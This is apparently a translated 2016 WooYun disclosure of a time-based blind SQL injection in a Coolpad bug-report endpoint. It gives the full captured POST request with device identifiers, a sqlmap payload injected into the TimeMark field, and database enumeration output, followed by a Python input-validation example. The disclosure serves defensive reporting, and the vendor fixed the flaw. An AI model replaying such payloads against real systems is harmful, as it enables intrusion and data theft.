
Vulnerability summary

Vulnerability ID: wooyun-2016-0185947

Title: A Yulong (Coolpad) site has a SQL injection vulnerability

Vendor: yulong.com

Author: 路人甲

Submitted: 2016-03-18 09:39

Fixed: 2016-05-02 15:13

Published: 2016-05-02 15:13

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-03-18: Details reported to the vendor, awaiting vendor handling
2016-03-18: Vendor has confirmed; details disclosed to the vendor only
2016-03-28: Details disclosed to core white hats and domain experts
2016-04-07: Details disclosed to regular white hats
2016-04-17: Details disclosed to intern white hats
2016-05-02: Details disclosed to the public

Brief description:

Detailed description:

One boring day I captured the phone's traffic and noticed that it uploads some reports, which is how I found this injection point.
POST injection point:

POST http://userreport.yulong.com/usercontrol.php HTTP/1.1
Connection: Keep-Alive
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=----9527bugreport20060606
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; Coolpad 9999 Build/JZO54K)
Host: userreport.yulong.com
Accept-Encoding: gzip
Content-Length: 1613
------9527bugreport20060606
Content-Disposition: form-data; name="BuildType"
user
------9527bugreport20060606
Content-Disposition: form-data; name="Software"
4.1.046.P0.141224.9999
------9527bugreport20060606
Content-Disposition: form-data; name="CoolCloudID"
------9527bugreport20060606
Content-Disposition: form-data; name="TimeMark"
2016-03-15 19:43:03
------9527bugreport20060606
Content-Disposition: form-data; name="IMSI"
460031266335918
------9527bugreport20060606
Content-Disposition: form-data; name="SN"
999902133505532
------9527bugreport20060606
Content-Disposition: form-data; name="VersionType"
LC
------9527bugreport20060606
Content-Disposition: form-data; name="BugType"
get_reply
------9527bugreport20060606
Content-Disposition: form-data; name="Active"
0
------9527bugreport20060606
Content-Disposition: form-data; name="IMEI"
861111024811666
------9527bugreport20060606
Content-Disposition: form-data; name="CpbInfo"
046.P0.141224.9999
------9527bugreport20060606
Content-Disposition: form-data; name="IMSI2"
204043161156949
------9527bugreport20060606
Content-Disposition: form-data; name="ProductName"
Coolpad 9999
------9527bugreport20060606
Content-Disposition: form-data; name="Describe"
null
------9527bugreport20060606
Content-Disposition: form-data; name="IMEID"
99000455490031
------9527bugreport20060606
Content-Disposition: form-data; name="Version"
4.1.046.P0.141224.9999
------9527bugreport20060606
Content-Disposition: form-data; name="VersionNameSelf"
2013.05.29_09.40_VER_2013.07.08_11:20:05


payload:

---
Parameter: MULTIPART TimeMark ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ------9527bugreport20060606
Content-Disposition: form-data; name="BuildType"
user
------9527bugreport20060606
Content-Disposition: form-data; name="Software"
4.1.046.P0.141224.9999
------9527bugreport20060606
Content-Disposition: form-data; name="CoolCloudID"
------9527bugreport20060606
Content-Disposition: form-data; name="TimeMark"
2016-03-15 19:43:03' AND (SELECT * FROM (SELECT(SLEEP(5)))tqEy) AND 'MhDd'='MhDd
------9527bugreport20060606
Content-Disposition: form-data; name="IMSI"
460031266335918
------9527bugreport20060606
Content-Disposition: form-data; name="SN"
999902133505532
------9527bugreport20060606
Content-Disposition: form-data; name="VersionType"
LC
------9527bugreport20060606
Content-Disposition: form-data; name="BugType"
get_reply
------9527bugreport20060606
Content-Disposition: form-data; name="Active"
0
------9527bugreport20060606
Content-Disposition: form-data; name="IMEI"
861111024811666
------9527bugreport20060606
Content-Disposition: form-data; name="CpbInfo"
046.P0.141224.9999
------9527bugreport20060606
Content-Disposition: form-data; name="IMSI2"
204043161156949
------9527bugreport20060606
Content-Disposition: form-data; name="ProductName"
Coolpad 9999
------9527bugreport20060606
Content-Disposition: form-data; name="Describe"
null
------9527bugreport20060606
Content-Disposition: form-data; name="IMEID"
99000455490031
------9527bugreport20060606
Content-Disposition: form-data; name="Version"
4.1.046.P0.141224.9999
------9527bugreport20060606
Content-Disposition: form-data; name="VersionNameSelf"
2013.05.29_09.40_VER_2013.07.08_11:20:05
---
[10:09:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.4, PHP 5.4.13
back-end DBMS: MySQL 5.0.12


Proof of vulnerability:

Current database and current user:

current user:    'root@%'
current database: 'db_yl_user_report'


The root user can apparently do quite a lot.
List all databases:
--dbs

[11:10:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.4, PHP 5.4.13
back-end DBMS: MySQL 5.0.12
[11:10:14] [INFO] fetching database names
[11:10:14] [INFO] fetching number of databases
[11:10:14] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[11:10:14] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:10:23] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
[11:10:53] [WARNING] turning off pre-connect mechanism because of connection time out(s)
13
[11:12:25] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
information


Alright, it was too slow so I stopped running it; this is already enough to prove the vulnerability exists.

Remediation:
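As an added example (not the reporter's or the vendor's code), a strict server-side allow-list check in Python for the multipart fields the captured request carries: the field names and boundary come from the capture above, while the per-field patterns and the sample values are assumptions for illustration. The TimeMark check parses the value as an exact datetime, so the sqlmap payload shown above is rejected before it can reach a query; this complements, rather than replaces, parameterised SQL.

```python
import re
from datetime import datetime

BOUNDARY = "----9527bugreport20060606"  # boundary from the captured request
DIGITS15 = r"[0-9]{14,15}"
VERSION = r"[0-9A-Za-z._:]{1,64}"
# Allow-list of the fields seen in the capture; patterns are assumptions, not the vendor's rules.
FIELD_RULES = {
    "BuildType": r"(user|eng|userdebug)", "Software": VERSION, "CoolCloudID": r"[0-9A-Za-z]{0,64}",
    "TimeMark": None, "IMSI": DIGITS15, "SN": r"[0-9A-Za-z]{1,32}", "VersionType": r"[A-Z]{1,8}",
    "BugType": r"[a-z_]{1,32}", "Active": r"[01]", "IMEI": DIGITS15, "CpbInfo": VERSION,
    "IMSI2": DIGITS15, "ProductName": r"[0-9A-Za-z ]{1,32}", "Describe": r"[^\x00-\x1f]{0,1000}",
    "IMEID": DIGITS15, "Version": VERSION, "VersionNameSelf": VERSION,
}

def build_body(values: dict) -> str:
    """Build a multipart/form-data body with the capture's boundary (constructed sample input)."""
    parts = [f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
             for k, v in values.items()]
    return "".join(parts) + f"--{BOUNDARY}--\r\n"

def parse_multipart(body: str) -> dict:
    """Parse the simple text-only form-data layout of the captured request."""
    fields = {}
    for part in body.split("--" + BOUNDARY):
        part = part.strip("\r\n")
        if part in ("", "--"):          # preamble / closing delimiter
            continue
        header, _, value = part.partition("\n")
        m = re.fullmatch(r'Content-Disposition: form-data; name="([^"\r]+)"\r?', header)
        if not m:
            raise ValueError("malformed multipart part")
        fields[m.group(1)] = value.strip("\r\n")
    return fields

def validate_report(fields: dict) -> list:
    """Names of fields that fail the allow-list; an empty list means the report is accepted."""
    bad = []
    for name, value in fields.items():
        if name not in FIELD_RULES:
            bad.append(name)                # unknown field: reject instead of passing it to SQL
        elif name == "TimeMark":
            try:                            # exact datetime format; a stray quote or SQL fails here
                datetime.strptime(value, "%Y-%m-%d %H:%M:%S")
            except ValueError:
                bad.append(name)
        elif not re.fullmatch(FIELD_RULES[name], value):
            bad.append(name)
    return bad
```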

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2016-03-18 15:13

Vendor reply:

Thanks for the report; it has been forwarded to the business team for handling. Also: Coolpad has set up an SRC, and you are welcome to submit vulnerabilities there; the rewards are generous.
http://

Latest status:

2016-03-18: The address was filtered. http://security.coolpad.com

2016-03-18: Vulnerability fixed